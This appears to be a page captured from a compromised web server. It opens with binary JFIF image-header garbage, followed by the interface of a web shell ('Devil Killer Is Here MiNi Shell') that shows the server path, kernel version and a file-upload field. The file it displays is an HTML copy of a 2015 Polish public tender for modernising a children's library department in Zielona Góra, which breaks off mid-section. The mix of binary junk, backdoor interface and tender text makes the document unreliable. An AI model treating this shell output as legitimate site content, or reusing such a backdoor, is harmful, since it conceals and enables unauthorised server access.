JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150805/199898-N-2015.html

<p class="kh_header"><b>Zielona Góra: Modernizacja i przystosowanie istniejących pomieszczeń Oddziału dla Dzieci w budynku głównym Wojewódzkiej i Miejskiej Biblioteki Publicznej im. C. Norwida w Zielonej Górze na nowoczesne Centrum Biblioteczne Dzieci i Młodzieży</b><br>
<b>Numer ogłoszenia: 199898 - 2015; data zamieszczenia: 05.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka i Miejska Biblioteka Publiczna im. C. Norwida w Zielonej Górze , al. Wojska Polskiego 9, 65-077 Zielona Góra, woj. lubuskie, tel. 068 4532600, 4532622, faks 068 4532603.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wimbp.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury - biblioteka publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja i przystosowanie istniejących pomieszczeń Oddziału dla Dzieci w budynku głównym Wojewódzkiej i Miejskiej Biblioteki Publicznej im. C. Norwida w Zielonej Górze na nowoczesne Centrum Biblioteczne Dzieci i Młodzieży.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych dotyczących  modernizacji i przystosowania istniejących pomieszczeń Oddziału dla Dzieci w budynku głównym Wojewódzkiej i Miejskiej Biblioteki Publicznej im. C. Norwida w Zielonej Górze na nowoczesne Centrum Biblioteczne Dzieci i Młodzieży.

Opis stanu istniejącego pomieszczeń przeznaczonych do modernizacji i przystosowania na nowoczesne Centrum Biblioteczne Dzieci i Młodzieży:
Budynek Biblioteki jest obiektem wolnostojącym składający się z dwóch części o zróżnicowanej wysokości. Część zachodnią obiektu stanowi tzw. budynek główny posiadający 8 kondygnacji (w tym jedną podziemną), część wschodnią budynek usługowy o 2 kondygnacjach w tym jedną podziemnej.
Budynek biblioteki posiada konstrukcję szkieletową opartą na siatce modularnej 6,0 x 6,0m. Słupy żelbetowe podtrzymują stropy żelbetowe - kasetonowe wytworzone przez podciągi, żebra pośrednie i płyty krzyżowo-zbrojone. Pomieszczenia Oddziału dla Dzieci usytuowane są na parterze 
w zachodniej części budynku. Oddział ten składa się z niewielkiego wiatrołapu, hallu wejściowego z szatnią, pomieszczeń sanitarnych, dwóch pomieszczeń biurowych, wypożyczalni, czytelni, pomieszczenia socjalnego oraz znajdującego się nad fragmentem czytelni (antresola) pomieszczenia cichej pracy pełniącego jednocześnie rolę magazynu książek i zabawek dla dzieci. Na antresolę prowadzą schody wewnętrzne usytuowane w centralnej części czytelni zabezpieczone balustradą konstrukcji stalowej z wypełnieniem płytami ze sklejki. Wypożyczalnia na fragmencie posiada wysokość dwóch kondygnacji (parteru + antresoli). Pozostałe pomieszczenia posiadają wysokość 3,4m (3,1m do żeber) od posadzki. Z uwagi na ukształtowanie przestrzenne bryły budynku biblioteki, nad częścią modernizowanej biblioteki znajduje się taras, pomieszczenia mieszkalne oraz magazynowe bufetu nie objęte niniejszym opracowaniem. Oddział ten połączony jest korytarzem z hallem głównym WiMBP znajdującym się w centralnej części budynku biblioteki. 

1.Zakres prac przewidzianych do wykonania w niniejszym postępowaniu obejmuje  modernizację Oddziału dla Dzieci zlokalizowanego na parterze, w zachodniej części budynku Wojewódzkiej i Miejskiej Biblioteki Publicznej im. C. Norwida w Zielonej Górze w celu stworzenia nowoczesnego Centrum Bibliotecznego dla Dzieci i Młodzieży i dotyczy: 
- wykonania prac budowlanych i wykończeniowych wraz z kolorystyką pomieszczeń, 
- wykonania nowej instalacji elektrycznej (oświetlenia i gniazd wtykowych), 
- wykonania instalacji komputerowej, głośnikowej i monitoringu, 
- wymianę części istniejących kanałów wentylacji mechanicznej na nowe z płyt ALP.

WYKAZ ROBÓT BUDOWLANYCH JAKIE NALEŻY WYKONAĆ W RAMACH MODERNIZACJI POMIESZCZEŃ. 

Prace demontażowe: 

- zdemontowanie istniejącej stolarki drzwiowej we wszystkich pomieszczeniach wraz z ościeżnicami, 
- zdemontowanie istniejących okładzin ściennych (boazeria) w pomieszczeniach nr 1, 2, 5 i 6 łącznie  z obudową przewodów instalacyjnych,
- wyburzenie fragmentów ścianek działowych w pomieszczeniach nr 5, 6a, 
- zdemontowanie obudowy i kanałów nieczynnej instalacji wentylacyjnej mechanicznej w pomieszczeniach nr 6 i 7 oraz fragmentu czynnej instalacji w pomieszczeniu nr 5, 
- powiększenie istniejących otworów drzwiowych oraz wykucie nowych pod osadzenie projektowanej stolarki, 
- zdemontowanie istniejącej ścianki działowej na antresoli z elementów PCV, 
- zdemontowanie istniejącej balustrady i poręczy schodów wewnętrznych, 
- skucie posadzki z płytek lastrykowych w pomieszczeniu nr 1, 2 i 3 oraz częściowo nr 5 (fragment obecnego hallu wejściowego włączonego do powierzchni wypożyczalni), 
- skucie posadzki z płytek ceramicznych w pomieszczeniach nr 9, 10 oraz częściowo nr 5 (fragment obecnego pomieszczenia biurowego włączonego teraz do powierzchni wypożyczalni), 
- zerwanie z podłóg płytki PCV, (pomieszczenia nr 5, 5a, 6, 6a, 8, 1.1) wraz z warstwą kleju, 
- skucie okładzin ceramicznych ścian w pomieszczeniach sanitarnych, zdemontowanie fragmentów ścianek z płyt wiórowych występujących nad drzwiami z przedsionka do kabiny WC, 
- zdemontowanie w całości istniejącej instalacji elektrycznej, 
- zdemontowanie misek ustępowych, umywalek i kratek ściekowych w pomieszczeniach nr 9 i 10, 
- zdemontowanie 2 grzejników w pomieszczeniu nr 6, wykucie w posadzce bruzd w celu przeprowadzenia instalacji i osadzenie grzejników w miejscu pokazanym w części graficznej, 
- wykucie w posadzce oraz na ścianach bruzd do rozprowadzenia projektowanej instalacji elektrycznej, 
- zdemontowanie w pomieszczeniu nr 5 istniejących, zabezpieczonych folią kanałów wentylacji mechanicznej, 
- oczyszczenie i przeszlifowanie istniejącego lastriko na schodach wewnętrznych (pomieszczenie nr 5). 

Prace montażowe i wykończeniowe 
- zabetonowanie istniejących otworów w stropie nad niskim parterem po zdemontowaniu nieczynnej instalacji wentylacji mechanicznej (pomieszczenie 6a), 
- murowanie nowych ścianek działowych, zamurowanie otworów w ściankach istniejących bloczkami     z gazobetonu zgodnie z częścią graficzną, 
- wykonanie nowej ścianki na antresoli z płyt G-K (na ruszcie stalowym z wypełnieniem wełną mineralną) częściowo przeszklonej zgodnie z rysunkami, 
- wykonanie częściowej zabudowy przestrzeni pod schodami wewnętrznymi (pomieszczenie 5a - schowek) z płyt mocowanych do konstrukcji drewnianej, 
- nadbudowanie istniejącej ścianki działowej pomiędzy przedsionkiem a kabina WC (z pozostawieniem otworu na montaż kratek kontaktowych) bloczkami z gazobetonu, 
- tynkowanie i szpachlowanie wszystkich ścianek po zdemontowaniu wcześniejszych okładzin oraz nowoprojektowanych i przygotowanie ich do malowania, 
- wyrównanie tynkiem powierzchni ścian, na których występuje (baranek) i przygotowanie ich do malowania, 
- zabudowanie w całości istniejącej wnęki w pomieszczeniu nr 5 (od wys. 3,40 do stropu ) 2 x płyta    G-K na ruszcie stalowym, 
- wykonanie częściowej zabudowy wnęki w pomieszczeniu nr 5 od poziomu posadzki do podciągu zgodnie z częścią graficzną, 
- wykonanie obudowy wszystkich biegnących przy słupach i ścianach instalacji sanitarnych płytami G-K 
- wykonanie ścianek instalacyjnych obudowanych płytami G-K w pomieszczeniach kabin sanitarnych, 
- oczyszczenie i wyrównanie podłoża we wszystkich pomieszczeniach masą samopoziomującą, 
- wykonanie nowych posadzek z płytek gresowych o klasie ścieralności 5 lub 4 w układzie i kolorystyce zgodnie z częścią graficzna opracowania, 
- wykonanie wykończenia podłóg wykładziną obiektową w kolorze i układzie jak na rysunku, cokoliki j.w wys.~7cm, 
- wyłożenie pomieszczenia na antresoli wykładziną dywanową w kolorze beżowym, listwy przypodłogowe białe wys. 7 cm,
- montowanie sufitów podwieszanych z płyt G-K we wszystkich pomieszczeniach za wyjątkiem korytarza (pomieszczenie nr 7) oraz antresoli (nr 1.1), na wysokościach podanych w części graficznej, 
- zastąpienie zdemontowanych w pomieszczeniu nr 5 kanałów wentylacji mechanicznej kanałami o takich samych przekrojach wykonanymi w technice ALP podwieszonymi na wysokości pokazanej w części graficznej opracowania,
- obudowanie pozostałych, widocznych w pomieszczeniach nr 2, 3, 4, 5, przewodów wentylacji mechanicznej, usytuowanych poniżej projektowanych sufitów podwieszonych,
- wykonanie okładziny ceramicznej na ścianach pomieszczeń sanitarnych do wysokości 2,1m od posadzki, 
- wykonanie (fartucha) z płytek ceramicznych szer. 60cm i dług. 2,0m przy zlewozmywaku w pomieszczeniu socjalnym (nr 8), 
- zamontowanie nowoprojektowanych ścianek i drzwi konstrukcji aluminiowej, 
- zamontowanie nowoprojektowanej stolarki drzwiowej oraz naświetleń zgodnie z rysunkiem, 
- zamontowanie przy schodach wewnętrznych nowej balustrady konstrukcji stalowej, 
- montowanie blatów w pomieszczeniach sanitarnych z konglomeratu grub. 3cm do osadzenia umywalek blatowych, 
- montowanie nowej armatury sanitarnej (miski ustępowe na stelażach, umywalki wpuszczane w blat  z bateriami na podczerwień, kratki ściekowe ze stali nierdzewnej) podłączając ją do istniejącej instalacji wod-kan., 
- zamontowanie w pomieszczeniu socjalnym zlewozmywaka z baterią zlewozmywakową robiąc podejście z istniejących w pomieszczeniu (nr 8) pionów wod-kan., 
- wykończenie (zabezpieczenie) ościeży wykutych otworów w ściance działowej w pomieszczeniu nr 5 listwami drewnianymi, 
- malowanie sufitów i ścian farbami hypoalergicznymi o wysokiej odporności na szorowanie  i zabrudzenia, dobrze wiążącymi z podłożem, matowymi. Wykonanie prac malarskich zgodnie z technologią i instrukcją producenta. 

Szczegółowy opis przedmiotu zamówienia zawiera załączona do niniejszej specyfikacji:
1. dokumentacja projektowa, 
2. przedmiary robót oraz 
3. specyfikacja techniczna wykonania i odbioru robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.30-8, 45.30.00.00-3, 45.31.43.20-0, 45.33.12.10-1, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w przetargu jest wniesienie wadium w wysokości: 5 000,00 zł     (słownie: pięć tysięcy złotych 00/100).
2.Termin wnoszenia wadium upływa w dniu składania ofert tj. 20 sierpnia 2015 roku    do godz. 12.00.
3.Wadium może być wnoszone: 
w pieniądzu, 
w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
w gwarancjach bankowych, 
w gwarancjach ubezpieczeniowych, 
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.)

4. Zamawiający uzna, że termin wpłaty wadium został dotrzymany, jeżeli przed upływem terminu składania ofert zostało uznane konto Zamawiającego.
5. Wadium w pieniądzu należy przelać na rachunek Zamawiającego 
 Bank Zachodni WBK S.A. I Oddział Zielona Góra 
 nr konta:  59 1090 1535 0000 0000 5301 9070
6. Kopię dowodu wpłaty wadium w pieniądzu zaleca się dołączyć do oferty.
7. Wymagania dotyczące wadium wnoszonego w formie gwarancji i poręczeń:

7.1.Nie budzące wątpliwości, zobowiązanie gwaranta lub poręczyciela do zapłaty beneficjentowi/ wierzycielowi (Zamawiającemu) należności (wraz z odsetkami)          w przypadku, gdy:
7.1.1.	 Zleceniodawca/ dłużnik (Wykonawca) w odpowiedzi na wezwanie, o którym mowa  w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów, o których mowa 
w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to 
z przyczyń nieleżących po jego stronie.
7.2.Oferta Zleceniodawcy/ dłużnika (Wykonawcy) została wybrana, a:
7.2.1.	Zleceniodawca/ dłużnik (Wykonawca) odmówił podpisania umowy 
w sprawie zamówienia publicznego na warunkach określonych 
w ofercie.
7.2.2.	Zleceniodawca/ dłużnik(Wykonawca) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
7.2.3.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Zleceniodawcy/ dłużnika  (Wykonawcy).
7.3.Zobowiązanie gwaranta/ poręczyciela winno być nieodwołalne, bezwarunkowe 
i płatne na pierwsze żądanie beneficjenta/ wierzyciela (Zamawiającego).
7.4.Gwarancja/ poręczenie winny spełniać wymogi określone we właściwych przepisach.
Powyższe warunki muszą wynikać z gwarancji lub poręczenia.
8. Wadium, bez względu na sposób jego wniesienia, musi obejmować, co najmniej cały okres związania ofertą, o którym mowa w rozdziale IX niniejszej SIWZ.
9.W przypadku wniesienia wadium w pozostałych formach (gwarancje, poręczenia) oryginał dokumentu potwierdzającego wniesienie wadium Wykonawca winien dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy którzy: 
1) wykażą, w zakresie niezbędnym do spełniania warunku wiedzy i doświadczenia, że w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali porównywalne roboty budowlane 
do robót objętych niniejszym postępowaniem tj.: wykonali, co najmniej jedną robotę budowlaną polegającą na modernizacji pomieszczeń o wartości nie mniejszej niż 100.000,00 zł (netto), z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty te zostały wykonane, 
2)udowodnią, że wskazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy: 
potwierdzą oświadczeniem, że do wykonania zamówienia dysponują lub będą dysponować osobami zdolnymi do wykonania niniejszego zamówienia tj.:

- kierownikiem robót posiadającym uprawnienia budowlane bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności konstrukcyjno - budowlanej, posiadającym minimum 3-letnie doświadczenie zawodowe 
w kierowaniu lub nadzorowaniu robót budowlanych
- przynajmniej jedną osobą lub osobami posiadającymi uprawnienia budowlane bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
